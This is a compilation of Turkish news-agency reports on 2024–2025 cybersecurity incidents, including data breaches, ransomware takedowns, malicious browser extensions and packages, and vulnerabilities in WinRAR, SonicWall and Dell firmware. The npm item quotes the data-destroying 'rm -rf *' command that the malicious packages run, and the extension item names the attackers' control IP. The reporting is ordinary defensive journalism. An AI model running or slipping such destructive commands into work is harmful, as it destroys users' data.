Kaynak: CUMHA - CUMHUR HABER AJANSI

Kara para aklama itirafı
Rodriguez ve Hill, Samourai Wallet üzerinden kara para aklama faaliyetlerine bilerek aracılık ettiklerini kabul etti. İkilinin, suç gelirlerinin gizlenmesini sağlamak için “Whirlpool” ve “Ricochet” adlı hizmetleri sunduğu ortaya çıktı.

80 bin Bitcoin işlendi
Mahkeme belgelerine göre, 2015–2024 yılları arasında hizmet aracılığıyla 80 binden fazla Bitcoin (2 milyar doların üzerinde) yasa dışı kaynaktan geçirilerek karıştırıldı. Bu işlemlerden yaklaşık 6 milyon dolar hizmet ücreti elde edildi.

Tutuklamalar ve kapatma
Kurucular Nisan 2024’te tutuklandı. Aynı gün İzlanda polisi Samourai’nin internet alan adlarını ve sunucularını ele geçirdi, Google ise uygulamayı Play Store’dan kaldırdı. Uygulama, kapanmadan önce 100 binden fazla kez indirilmişti.

Suçun bilincindeydiler
Savcıların aktardığına göre, Rodriguez WhatsApp yazışmalarında “karıştırmayı bitcoin için kara para aklama” olarak tanımladı. Hill ise karanlık ağ forumlarında Samourai’yi “kirli BTC temizleme aracı” olarak tanıttı.

Mahkeme süreci ve ceza ihtimali
İkili, suçunu kabul ederek kara para aklama operasyonunu yürüttüğünü kabul etti. Anlaşma kapsamında 237,8 milyon dolar tutarında varlığı devlete bırakacaklar. Rodriguez ve Hill, para aklama suçlamasında 20 yıla kadar, izinsiz para transferi suçlamasında ise 5 yıla kadar hapisle yargılanıyordu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sahte cüzdan uzantıları mağazaya sızdı
Koi Security’nin bulgularına göre saldırganlar, sahte kripto cüzdanı uzantılarını ilk etapta zararsız görünecek şekilde mağazaya yükledi. Onay aldıktan sonra ise marka ve logoları değiştirip zararlı kod enjekte ettiler.

Kullanıcı bilgileri keylogger ile çalındı
Uzantılara entegre edilen kod, kullanıcıların cüzdan giriş bilgilerini eklenti pencerelerindeki form alanlarından kaydederek saldırganların kontrolündeki uzak sunuculara gönderdi. Ayrıca kurbanların IP adresleri de izlendi.

Sahte sitelerle desteklendi
Kampanyaya paralel olarak, Trezor ve Jupiter Wallet gibi bilinen cüzdan sağlayıcılarını taklit eden çok sayıda sahte web sitesi açıldı. Bu siteler, LummaStealer gibi bilgi hırsızları ve fidye yazılımları dahil 500’den fazla zararlı yazılımın dağıtımını yaptı. Tüm operasyon, 185.208.156.66 IP adresi üzerinden yönetildi.

AI desteğiyle ölçeklendirildi
Araştırmaya göre kampanyada kullanılan kodlarda yapay zekâ izleri görüldü. Bu sayede saldırganların farklı yükler geliştirmesi, tespitten kaçınması ve saldırıları hızla büyütmesi kolaylaştı.

Mozilla eklentileri kaldırdı
Mozilla, şikâyetlerin ardından uzantıları mağazadan kaldırdı. Ancak kampanyanın büyüklüğü, daha önce Haziran 2025’te devreye alınan koruma sistemine rağmen sahte cüzdan uzantılarının hâlâ mağazaya sızabildiğini gösteriyor.

Chrome mağazasına da sıçrayabilir
Koi Security, GreedyBear grubunun Chrome Web Store’a da geçmeyi planladığını ve şimdiden “Filecoin Wallet” adlı sahte bir Chrome uzantısının tespit edildiğini bildirdi.

Kullanıcılar için öneriler
Uzmanlar, eklenti kurmadan önce yayıncı bilgilerini ve kullanıcı yorumlarını kontrol etmeyi, resmi cüzdan projelerinin yalnızca kendi sitelerinden yönlendirdiği bağlantılarla indirilmesini tavsiye ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sıfır gün iddiası reddedildi
Geçtiğimiz hafta Arctic Wolf Labs, SonicWall Gen 7 cihazlarını hedef alan saldırıların sıfır gün açığa işaret edebileceğini duyurmuştu. Ancak SonicWall, yaptığı incelemeler sonucunda saldırıların CVE-2024-40766 adlı bilinen bir zafiyet üzerinden gerçekleştiğini bildirdi.

CVE-2024-40766 nedir
Bu açık, SonicOS yazılımındaki SSLVPN erişim kontrol zafiyeti nedeniyle yetkisiz kişilerin VPN oturumlarını ele geçirmesine imkân tanıyor. Açık, Ağustos 2024’te yayımlanan SNWLID-2024-0015 danışma belgesiyle duyurulmuştu.

Migrasyon hataları istismar edildi
SonicWall, 40 farklı olayın incelenmesi sonucunda pek çok vakada Gen 6’dan Gen 7’ye geçişte yerel kullanıcı parolalarının sıfırlanmadığını ve bunun saldırganların sisteme erişimini kolaylaştırdığını belirtti. Oysa parolaların sıfırlanması, orijinal güvenlik tavsiyelerinde kritik bir adım olarak açıklanmıştı.

Yeni önerilen adımlar
Şirket, kullanıcıların cihaz yazılımını 7.3.0 veya daha yeni sürümlere yükseltmesini, SSLVPN için kullanılan tüm yerel hesap parolalarının derhal sıfırlanmasını ve mümkünse erişimin yalnızca güvenilir IP’lerle sınırlandırılmasını tavsiye ediyor.

Kullanıcıların şüpheleri sürüyor
Buna rağmen bazı kullanıcılar, Reddit’te yaptıkları yorumlarda SonicWall’ın açıklamalarının kendi deneyimleriyle örtüşmediğini, hatta bazı log dosyalarının incelenmediğini iddia etti. Bu nedenle uzmanlar, resmi açıklamaların ötesinde yüksek düzeyde dikkat ve hızlı önlem alınması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı 4 Ağustos’ta gerçekleşti
Bouygues Telecom, 4 Ağustos 2025 Pazar günü bir siber saldırıya uğradığını ve yetkisiz erişim sonucu 6,4 milyon müşteriye ait kişisel verilerin ele geçirildiğini doğruladı. Şirketin teknik ekipleri saldırıya hızlı şekilde müdahale ettiklerini ve ek güvenlik önlemlerinin alındığını açıkladı.

Etkilenen müşteri bilgileri
Yapılan açıklamaya göre saldırıda ele geçirilen veriler arasında müşterilerin iletişim bilgileri, sözleşme detayları, medeni durum verileri, kurumsal müşterilere ait şirket bilgileri ve IBAN numaraları bulunuyor. Şirket, kredi kartı bilgilerinin ve müşteri hesap şifrelerinin bu ihlalden etkilenmediğini vurguladı.

Yetkililer bilgilendirildi
Bouygues Telecom, saldırının bilinen bir siber suç grubu tarafından şirket içi kaynaklar hedef alınarak gerçekleştirildiğini belirtti. Konuyla ilgili olarak Fransa Ulusal Siber Güvenlik Ajansı (ANSSI) ve Kişisel Verileri Koruma Kurumu (CNIL) bilgilendirildi. Saldırıyı düzenleyenler için 5 yıla kadar hapis ve 150 bin euroya kadar para cezası öngörülüyor.

Müşterilere dolandırıcılık uyarısı
Şirket, müşterilerini SMS ve e-posta yoluyla bilgilendirmeye başladı. Açıklamada, kimlik avı ve sahte aramalara karşı dikkatli olunması gerektiği, hesap bilgilerini isteyen kişilere güvenilmemesi gerektiği uyarısı yapıldı. Ayrıca, IBAN bilgilerinin tek başına işlem için yeterli olmamasına rağmen müşterilerin hesap hareketlerini yakından takip etmeleri tavsiye edildi.

Fransız telekom sektöründe artan tehdit
Bouygues Telecom’daki ihlal, sadece bir hafta önce Orange’ın yaşadığı ağ saldırısının ardından geldi. Avrupa’daki bu gelişmeler, ABD merkezli telekom şirketlerini hedef alan ve Çin bağlantılı Salt Typhoon grubuna atfedilen saldırılarla benzerlik gösteriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yeni EDR öldürücü aracı
Sophos’un raporuna göre, fidye yazılım grupları tarafından kullanılan yeni EDR öldürücü aracı, güvenlik çözümlerini devre dışı bırakarak saldırganların ağlarda fark edilmeden hareket etmesine olanak sağlıyor. Araç, RansomHub, Blacksuit, Medusa, Qilin, Dragonforce, Crytox, Lynx ve INC grupları tarafından kullanıldı.

BYOVD yöntemiyle kernel ayrıcalıkları
Araç, zararlı bir sürücüyü (çoğu zaman çalıntı ya da süresi dolmuş dijital sertifikayla imzalanmış) yükleyerek “Bring Your Own Vulnerable Driver” (BYOVD) saldırısı gerçekleştiriyor. Böylece çekirdek seviyesinde ayrıcalık kazanarak güvenlik yazılımlarını kapatıyor.

Hedef alınan güvenlik çözümleri
Saldırının hedefinde Sophos, Microsoft Defender, Kaspersky, Symantec, Trend Micro, SentinelOne, Cylance, McAfee, F-Secure, HitmanPro ve Webroot gibi çok sayıda EDR ve antivirüs ürünü yer alıyor.

Paylaşılan bir geliştirme altyapısı
Sophos, aracın tek bir sızıntı sonucu yayılmadığını, farklı fidye yazılım gruplarının aynı çerçeve üzerinden kendi sürümlerini oluşturduğunu belirtiyor. Tüm varyantlarda HeartCrypt paketleyicisinin kullanıldığı ve bilgi/araç paylaşımının yoğun olduğu ifade edildi.

Benzer araçlar daha önce de kullanıldı
EDRKillShifter dışında, AuKill ve AvNeutralizer gibi araçlar da farklı gruplar tarafından güvenlik yazılımlarını etkisiz hale getirmek için kullanılmıştı. Bu yöntem, fidye yazılım ekosisteminde giderek yaygınlaşıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tespit edilmesi zor
Microsoft’un açıklamasına göre, saldırılar yerel Exchange sunucularından geldiğinde Microsoft Purview gibi bulut tabanlı loglama araçları bu etkinlikleri kaydetmeyebiliyor. Bu durum saldırıların fark edilmesini güçleştiriyor.

Araştırmacı Black Hat’te gösterdi
Outsider Security’den araştırmacı Dirk-Jan Mollema, Black Hat konferansında açığı göstererek Microsoft’a üç hafta önce rapor ettiğini açıkladı. Microsoft, konferansla eş zamanlı olarak güvenlik duyurusu ve gerekli yamaları yayımladı.

Federal kurumlara zorunlu adımlar
CISA’nın 25-02 sayılı acil direktifine göre kurumlar:

• Microsoft Health Checker script ile Exchange ortamlarını tarayacak,

• Destek dışı sunucuları ağdan ayıracak,

• Güncel kümülatif yamaları (Exchange 2019 için CU14/15, 2016 için CU23) yükleyecek,

• Nisan 2025 hotfix’ini uygulayacak,

• Ardından ConfigureExchangeHybridApplication.ps1 scripti ile paylaşımlı servis hesabından özel hibrit uygulamaya geçiş yapacak.

Kurumların teknik düzeltmeleri Pazartesi sabahına kadar tamamlaması ve aynı gün 17.00’ye kadar CISA’ya rapor sunması gerekiyor.

Tüm kuruluşlara uyarı
CISA, zorunluluk yalnızca federal kurumlar için geçerli olsa da, açığın tüm sektörlerde risk oluşturduğunu belirterek özel kuruluşları da güncelleme yapmaya çağırdı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

NPM’de sahte WhatsApp kütüphaneleri
Siber güvenlik şirketi Socket, NPM platformunda WhatsApp geliştirme araçları kılığına giren iki zararlı paketi tespit etti. “naya-flore” ve “nvlore-hsc” isimli paketler, WhatsApp botları ve otomasyon araçları geliştirenleri hedef alıyor.

Dosya silme komutu çalıştırıyor
Her iki pakette de “requestPairingCode” adlı fonksiyon, WhatsApp eşleştirme işlemi gibi görünse de aslında bir GitHub adresinden gelen verileri işliyor. Belirli telefon numaralarına sahip kullanıcılar hariç, hedef alınan geliştiricilerin sisteminde “rm -rf *” komutu çalıştırılıyor ve bulunduğu dizindeki tüm dosyalar siliniyor.

Veri sızdırma fonksiyonu da var
Paketlerde ayrıca “generateCreeds” adlı, telefon numarası, cihaz kimliği ve anahtar bilgilerini çalabilecek bir fonksiyonun da bulunduğu tespit edildi. Bu fonksiyon şu an yorum satırına alınmış durumda ancak ileride aktif hale getirilebileceği uyarısı yapıldı.

Go geliştiricileri de risk altında
Socket, aynı zamanda Go ekosisteminde 11 zararlı paket keşfetti. Bu paketler, sahte isimlerle yüklenip çalıştırıldığında uzaktan yüklenen zararlı komut dosyalarını çalıştırıyor. Çoğu, yazım hatalarına dayalı “typosquatting” yöntemiyle geliştiricileri yanıltmayı hedefliyor.

Geliştiricilere uyarı
Araştırmacılar, hem NPM hem de Go geliştiricilerinin kullandıkları kütüphaneleri dikkatle doğrulamaları gerektiğini vurguladı. Birçok paket hâlâ aktif durumda bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Çete 2022’den bu yana aktifti
ABD İç Güvenlik Soruşturmaları (HSI), Royal ve BlackSuit olarak bilinen siber suç grubunun altyapısının uluslararası iş birliğiyle geçen ay çökertildiğini duyurdu. Grubun 2022’den bu yana 450’den fazla ABD şirketini hedef aldığı belirlendi.

Çifte şantaj yöntemiyle milyonlarca dolar
Açıklamaya göre saldırganlar, sistemleri şifreleyerek kullanılamaz hale getiriyor, ardından çalınan verileri sızdırma tehdidiyle ödeme talep ediyordu. Bu yöntemle elde edilen fidye miktarı 370 milyon doların üzerine çıktı.

Conti’den Royal’a, oradan BlackSuit’a
Grup ilk kez 2022 başında Quantum fidye yazılımıyla ortaya çıktı ve Conti çetesinin halefi olarak değerlendirildi. Aynı yıl Royal markasıyla yeniden ortaya çıkan grup, 2023’te Dallas şehrini hedef aldıktan sonra BlackSuit adını benimsedi.

Uluslararası operasyonla çökertildi
ABD Adalet Bakanlığı, 24 Temmuz 2025’te yaptığı açıklamada BlackSuit’in karanlık ağ sitelerinin ele geçirildiğini ve yerine “seizure banner” uyarılarının yerleştirildiğini duyurdu. Operasyonun kod adı “Checkmate” olarak açıklandı.

Yeni kimlikle geri dönüş ihtimali
Cisco Talos araştırmacıları, BlackSuit’in yeniden yapılanarak Chaos adıyla faaliyet göstermeye başladığına dair bulgular tespit etti. Yeni yapı, fidye yazılım hizmeti (RaaS) modeliyle çalışıyor ve hem yerel hem uzak depolamayı hedef alan saldırılarda çifte şantaj yöntemi kullanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı Mayıs’ta gerçekleşti
Columbia Üniversitesi, 16 Mayıs 2025 civarında yetkisiz erişim yoluyla ağ sistemlerine girildiğini ve belirli dosyaların dışarıya çıkarıldığını duyurdu. Olay, 24 Haziran’da sistemlerde yaşanan kesinti sonrası başlatılan inceleme sırasında ortaya çıktı.

870 bine yakın kişi etkilendi
Üniversitenin Maine Başsavcılığı’na sunduğu belgelerde, 868 bin 969 kişinin ihlalden etkilendiği belirtildi. Bu kişiler arasında mevcut ve eski öğrenciler, başvuru sahipleri, çalışanlar ve bazı aile üyeleri bulunuyor.

Çalınan verilerin kapsamı geniş
Bildirim mektuplarına göre, etkilenen veriler arasında ad, doğum tarihi, Sosyal Güvenlik numarası, iletişim bilgileri, demografik veriler, akademik kayıtlar, mali yardım bilgileri ve sağlık ile sigorta verileri yer alıyor. Üniversite, Columbia University Irving Medical Center hasta kayıtlarının etkilenmediğini duyurdu.

Ücretsiz kimlik koruma desteği
Columbia Üniversitesi, çalınan verilerin henüz dolandırıcılıkta kullanılmadığına dair bir bulgu olmadığını açıklasa da, mağdurlara iki yıl boyunca Kroll üzerinden ücretsiz kredi izleme, dolandırıcılık danışmanlığı ve kimlik hırsızlığına karşı destek hizmetleri sunulacağını bildirdi.

Hacker 460 GB veri çaldığını iddia etti
Üniversite, geçtiğimiz hafta yaptığı ilk açıklamada, saldırganın yaklaşık 460 gigabayt veriyi ele geçirdiği yönündeki iddiaları doğrulamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

FPRPC devre dışı bırakılıyor
Microsoft, 365 uygulamalarının 2508 sürümüyle birlikte FPRPC üzerinden dosya erişiminin varsayılan olarak engelleneceğini açıkladı. Engelleme Ağustos sonunda başlayacak, tüm kullanıcılara Eylül 2025 sonuna kadar ulaşacak.

FTP ve HTTP için yeni ayarlar
Yeni Trust Center ayarlarıyla kullanıcılar, yöneticiler izin verdiği sürece FPRPC’yi yeniden etkinleştirebilecek. Ayrıca FTP ve HTTP üzerinden dosya açma işlemleri hâlen varsayılan olarak açık olsa da, kullanıcıların bu protokolleri kapatma seçeneği olacak.

Yöneticiler için CPS kontrolü
Yöneticiler, Cloud Policy Service (CPS) üzerinden kimlik doğrulama protokollerini yönetebilecek. Eğer bir protokol CPS üzerinden devre dışı bırakılırsa, kullanıcılar Trust Center ayarlarıyla yeniden aktif hale getiremeyecek.

Microsoft güvenlik önlemlerini artırıyor
Şirket, son dönemde güvenlik açıklarını azaltmak için art arda önlemler aldı. Ocak 2025’ten itibaren ActiveX kontrolleri Microsoft 365 ve Office 2024’te devre dışı bırakıldı. Temmuz ayında Teams toplantılarında ekran görüntüsü engelleme özelliği devreye alındı. Outlook’ta ise .library-ms ve .search-ms dosya türleri engellenen ekler listesine eklendi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Politico’nun iddiaları sonrası açıklama geldi
Politico’nun hafta başında yayımladığı haberde, saldırının bazı federal bölgelerde gizli bilgileri ortaya çıkardığı, hatta gizli tanıkların kimliklerini açığa çıkarmış olabileceği öne sürülmüştü. Kurumun yaptığı açıklama bu iddiaları doğrudan teyit etmese de, davacıları etkileyecek verilerin zarar görmüş olabileceğini ima ediyor.

4 Temmuz’da fark edildi
İsimsiz kaynaklara göre, saldırının boyutu 4 Temmuz 2025’te tam olarak anlaşıldı ve ardından kurum içinde gizli bir bilgilendirme yapıldı. Ancak kamuoyuna ilk resmi açıklama ancak Politico’nun haberinden sonra geldi.

Güvenlik önlemleri artırılıyor
Yargı yetkilileri, sistemin güvenliğinin artırıldığını, saldırıları engellemek için yeni önlemler alındığını ve mahkemelerle iş birliği yapılarak davacılar üzerindeki etkinin en aza indirilmeye çalışıldığını duyurdu.

Kamu ve özel sektörde artan tehdit
Federal Yargı, hem kamu hem de özel kurumlara yönelik siber saldırıların artan hacim ve karmaşıklığına dikkat çekerek, eski sistemlerin korunmasının giderek zorlaştığını vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kayıplar 2024’te rekor kırdı
FTC’nin Tüketici Koruma Veri Raporu’na göre 2024 yılında 60 yaş üstü bireyler toplamda 700 milyon dolarını dolandırıcılara kaptırdı. Bu miktar, 2020’deki 121 milyon dolarlık kaybın altı katına, 2023’teki 542 milyon dolarlık kaybın ise yüzde 30 üzerine çıktı.

En büyük kayıp 100 bin dolar üstünde
Rapor, 2024’te 100 bin doların üzerinde kayıp yaşayanların toplam 445 milyon dolar kaybettiğini ortaya koydu. 10 ila 100 bin dolar arası kayıplar 214 milyon dolar, 10 bin dolar altındaki kayıplar ise 41 milyon dolar olarak kaydedildi.

Dolandırıcıların en sık kullandığı yöntemler
Dolandırıcılık yöntemleri arasında resmi kurum ya da şirket kılığına girme, sahte kriz senaryoları ve telefonla baskı en öne çıkanlar oldu. Dolandırıcılar, bankalarda şüpheli işlem, sosyal güvenlik numarasıyla işlenen suç veya bilgisayar korsanlığı iddialarıyla mağdurları kandırdı.

FTC adına sahte aramalar yapıldı
FTC’nin açıklamasına göre bazı dolandırıcılar, ironiyle kurumun adını kullanarak sahte personel kimliğiyle insanları kandırdı. Mağdurlara, paralarını Bitcoin ATM’lerine yatırmaları, nakit veya altın teslim etmeleri gibi asılsız yönlendirmeler yapıldı.

Yaşlılar neden hedef alınıyor
Rapora göre yaşlı yetişkinler, daha büyük finansal birikimlere sahip olmaları, otoritelere duydukları güven ve teknolojiyi daha az bilme sebebiyle hedef oluyor. Birçok kişinin hayat birikimlerini ve emeklilik hesaplarını kaybettiği bildirildi.

Genel dolandırıcılık kaybı 12,5 milyar dolar
FTC, 2024 yılında Amerikalıların toplam dolandırıcılık kaybının 12,5 milyar dolara ulaştığını ve bunun 2023’e göre yüzde 25 artış anlamına geldiğini duyurdu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dizin geçişi açığı tespit edildi
ESET araştırmacıları Anton Cherepanov, Peter Košinár ve Peter Strýček tarafından keşfedilen CVE-2025-8088 açığı, WinRAR’ın önceki sürümlerinde dosya çıkartma sırasında saldırgan tarafından belirlenen bir yola yönlendirme yapılmasına imkân veriyor.

Windows başlangıç klasörüne kötü amaçlı dosya
Bu yöntemle saldırganlar, zararlı yürütülebilir dosyaları Windows Başlangıç klasörlerine yerleştirebiliyor. Kullanıcı oturum açtığında dosya otomatik çalışıyor ve uzaktan kod yürütme sağlanıyor.

Phishing kampanyalarında kullanıldı
ESET, RomCom grubunun hedefli kimlik avı e-postaları aracılığıyla gönderilen RAR eklerinde bu açığı kullandığını belirledi. Bu saldırılarla kurban sistemlere RomCom arka kapıları yüklendi.

RomCom’un geçmiş faaliyetleri
Rusya bağlantılı RomCom grubu (Storm-0978, Tropical Scorpius veya UNC2596 olarak da biliniyor), daha önce Cuba ve Industrial Spy fidye yazılımlarıyla ilişkilendirilmişti. Grup, kimlik bilgisi hırsızlığı ve veri gaspı odaklı saldırılarda sıfır gün açıklarını sıkça kullanıyor.

Kullanıcılara güncelleme uyarısı
Uzmanlar, WinRAR’ın otomatik güncelleme özelliği bulunmadığı için tüm kullanıcıların 7.13 sürümünü manuel olarak indirip yüklemesi gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Beş güvenlik açığı tespit edildi
Cisco’nun Talos güvenlik ekibi, Dell’in ControlVault3 firmware ve Windows API’lerinde beş kritik açık keşfetti. CVE-2025-24311, CVE-2025-25050, CVE-2025-25215, CVE-2025-24922 ve CVE-2025-24919 kodlarıyla tanımlanan açıklar bellek taşmalarından güvensiz serileştirmeye kadar farklı güvenlik kusurlarını içeriyor.

Oturum açma atlatılabiliyor
Araştırmaya göre saldırganlar bu açıkları zincirleyerek firmware üzerinde keyfi kod çalıştırabiliyor. Bu sayede Windows oturum açma işlemini atlatmak, kullanıcı ayrıcalıklarını yönetici seviyesine çıkarmak ve kalıcı kötü amaçlı yazılımlar yerleştirmek mümkün hale geliyor.

Fiziksel erişim riski
Cisco Talos, fiziksel erişimi bulunan bir saldırganın cihazı açarak USB üzerinden Unified Security Hub (USH) kartına bağlanabileceğini, böylece parmak izi doğrulamasını manipüle ederek cihazın herhangi bir parmak izini kabul etmesini sağlayabileceğini bildirdi.

Dell güncelleme yayımladı
Dell, Mart-Mayıs 2025 arasında ControlVault3 sürücü ve firmware güncellemeleri yayımladı. Şirket, etkilenen modellerin tam listesini güvenlik duyurusunda paylaştı.

Önerilen önlemler
Araştırmacılar, cihazların güncel tutulması, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik bileşenlerinin devre dışı bırakılması gerektiğini vurguladı. Ayrıca BIOS üzerinden kasa açılma uyarısının etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği (ESS) özelliğinin kullanılmasının fiziksel saldırılara karşı ek koruma sağlayacağı belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hesap ele geçirilerek müşteri verilerine ulaşıldı
Richemont İstanbul Lüks Eşya Dağıtım A.Ş., veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre ihlal, Richemont Group bünyesinde görev yapan bir çalışanın hesabının yetkisiz kişilerce ele geçirilmesiyle gerçekleşti.

İhlal dört ay sonra fark edildi
Saldırının 17-18 Ocak 2025 tarihlerinde gerçekleştiği, ancak 30 Mayıs 2025 tarihinde tespit edilebildiği aktarıldı.

25 bini aşkın müşteri etkilendi
Olaydan 25 bin 737 müşteri ve potansiyel müşterinin etkilendiği bildirildi. Ele geçirilen veriler arasında isim, e-posta adresi, ülke bilgisi, müşteri kimliği ve doğum tarihi yer aldı.

KVKK kamuoyuna duyurma kararı aldı
Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/1006 sayılı kararıyla veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin incelemeler devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yetkisiz erişim iki gün sürdü
İstanbul Gedik Üniversitesi, yaşanan veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, 13-14 Mayıs 2025 tarihleri arasında üniversite adına veri işleyen şirketin sistemlerine yetkisiz erişim sağlandı ve durum 14 Mayıs’ta tespit edildi.

23 bin kişi, 209 bin kayıt etkilendi
Veri ihlalinden çalışanlar, kullanıcılar ve öğrencilerin yer aldığı 23 bin 269 kişinin etkilendiği, toplamda 209 bin 421 kayıtta kişisel verilerin risk altında olduğu belirtildi.

Hangi veriler sızdırıldı
İhlalden etkilenen veriler arasında ad, soyad, kullanıcı adı, maskelenmiş T.C. kimlik numarası (yalnızca son dört hanesi görünür şekilde), e-posta adresi, kurum-departman bilgileri ve kullanıcı trafik verileri bulunduğu aktarıldı.

KVKK kararıyla kamuoyuna duyuruldu
Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/997 sayılı kararıyla veri ihlalinin kamuoyuna duyurulmasına karar verdi. Konuyla ilgili incelemeler devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yetkisiz erişim üçüncü taraf üzerinden gerçekleşti
Louis Vuitton Çantacılık Ticaret A.Ş., müşterilere ait veritabanına yönelik yetkisiz erişim hakkında Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, ihlal üçüncü taraf bir hizmet sağlayıcının yöneticisi tarafından kullanılan servis hesabının ele geçirilmesiyle başladı.

İhlal bir ay sürdü
7 Haziran 2025’te başlayan saldırı, 2 Temmuz 2025’te tespit edildi. Yetkisiz erişim süresince müşterilere ait kimlik ve iletişim bilgilerinin risk altına girdiği ifade edildi.

142 bin kişi etkilendi
Türkiye’de 142 bin 995 müşteri ve potansiyel müşterinin verilerinin etkilendiği bildirildi. İncelemeler sürerken, etkilenen veri kategorilerinin kimlik ve iletişim bilgileri olduğu aktarıldı.

KVKK’dan kamuoyuna duyuru kararı
Kişisel Verileri Koruma Kurulu, 10 Temmuz 2025 tarihli ve 2025/1246 sayılı kararıyla veri ihlalinin kurumun internet sitesinde yayımlanmasına karar verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dosyalar yasa dışı paylaşım sitelerine yüklendi
BeiGene, Ltd. tarafından yapılan bildirimde, 16 Haziran 2025 tarihinde sınırlı sayıda kurumsal dosyanın pastebin.com ve swisstransfer.com platformlarına yüklendiği tespit edildi.

Klinik çalışmalara ait veriler sızdırıldı
Sızdırılan belgelerin, şirketin yürüttüğü klinik çalışmaların planlanması ve takibi için kullanılan verileri içerdiği belirtildi.

467 kişi etkilendi
Veri ihlalinden Türkiye’de 17 çalışan ve 450 hasta olmak üzere toplam 467 kişinin etkilendiği bildirildi. Etkilenen kişisel veri kategorilerinin kimlik, iletişim ve sağlık bilgileri olduğu aktarıldı.

KVKK kamuoyuna duyurma kararı aldı
Kişisel Verileri Koruma Kurulu, 24 Haziran 2025 tarihli ve 2025/1130 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Olayla ilgili incelemelerin sürdüğü belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güvenlik açığı 2023’ten bu yana mevcuttu
Bold LLC tarafından yapılan açıklamaya göre, kullanıcıların özgeçmişlerini düzenlerken gerçek zamanlı ön izleme imkânı sunan yeni bir özelliğin yetkisiz erişime açık olduğu 12 Temmuz 2025’te tespit edildi. İncelemeler, söz konusu açığın ilk olarak 10 Mart 2023 tarihinde ortaya çıktığını ortaya koydu.

Bir kez yetkisiz erişim gerçekleşti
Şirketin bildiriminde, sunucu ortamının daha hızlı performans için anonimleştirilmiş verileri önbelleğe almak üzere erişilebilir hale getirildiği, bu durum nedeniyle yalnızca bir kez yetkisiz erişimin yaşandığı ifade edildi.

Anonimleştirilmiş özgeçmiş verileri etkilendi
İhlalden etkilenen veriler arasında isim, iletişim bilgileri ve özgeçmiş içerikleri yer aldı. Verilerin kapsamı kullanıcı tercihine bağlı olarak değişiklik gösterirken, bazı özgeçmişlerde sadece ad ve soyad bilgileri bulunduğu, bazılarında ise eğitim, istihdam geçmişi, iletişim bilgileri, fotoğraflar ve gönüllü olarak paylaşılan diğer bilgilerin yer aldığı bildirildi.

3 bini aşkın kullanıcı etkilendi
Bold LLC, ihlalden etkilenen ilgili kişi gruplarının kullanıcılar ve aboneler olduğunu, toplam 3168 kişinin verilerinin etkilendiğini açıkladı.

KVKK duyuru kararı aldı
Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1356 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. İncelemelerin sürdüğü aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı aynı gün tespit edildi
Yatırım Finansman Menkul Değerler A.Ş., 20 Temmuz 2025’te yaşanan fidye yazılımı saldırısını Kişisel Verileri Koruma Kurumu’na bildirdi. Açıklamaya göre saldırı aynı gün tespit edildi.

Uluslararası bir saldırı grubu hedef aldı
Şirketin bildiriminde, sunucular ve istemci bilgisayarların uluslararası ve uzman bir saldırı grubu tarafından hedef alındığı belirtildi.

Kişisel veriler üzerindeki etki araştırılıyor
Saldırının ardından etkilenen kişi sayısı, ilgili kişi grupları ve kişisel veri kategorilerinin henüz belirlenemediği ifade edildi. Teknik incelemelerin devam ettiği aktarıldı.

Vatandaşlar için başvuru kanalları
Şirket, saldırıyla ilgili bilgi almak isteyen kişilerin tüm şubelerden ve 0 850 723 59 59 numaralı Yatırımcı Destek Hattı üzerinden destek alabileceğini duyurdu.

KVKK’dan duyuru kararı
Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1359 sayılı kararıyla ihlalin Kurumun internet sitesinde ilan edilmesine karar verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yasadışı platformlarda satışa çıkarıldı
Biletal İç ve Dış Ticaret A.Ş., siber saldırı sonucu kişisel verilerin yasa dışı internet platformlarında satışa çıkarıldığını Kişisel Verileri Koruma Kurumu’na (KVKK) bildirdi.

İhlal 11 Ağustos’ta tespit edildi
Açıklamaya göre, Bilgi Teknolojileri ve İletişim Kurumu’ndan (BTK) gelen yazının ardından şirket bilişim ekiplerinin yaptığı inceleme sonucunda ihlal 11 Ağustos 2025 tarihinde tespit edildi.

7 bin 800 müşteri etkilendi
Veri ihlalinden yaklaşık 7 bin 800 kişinin etkilendiği belirtilirken, ihlale konu olan kişisel veriler arasında kimlik, iletişim ve müşteri işlem bilgileri bulunduğu ifade edildi. Etkilenen grubun sadece müşteriler olduğu bildirildi.

KVKK’dan kamuoyuna duyuru kararı
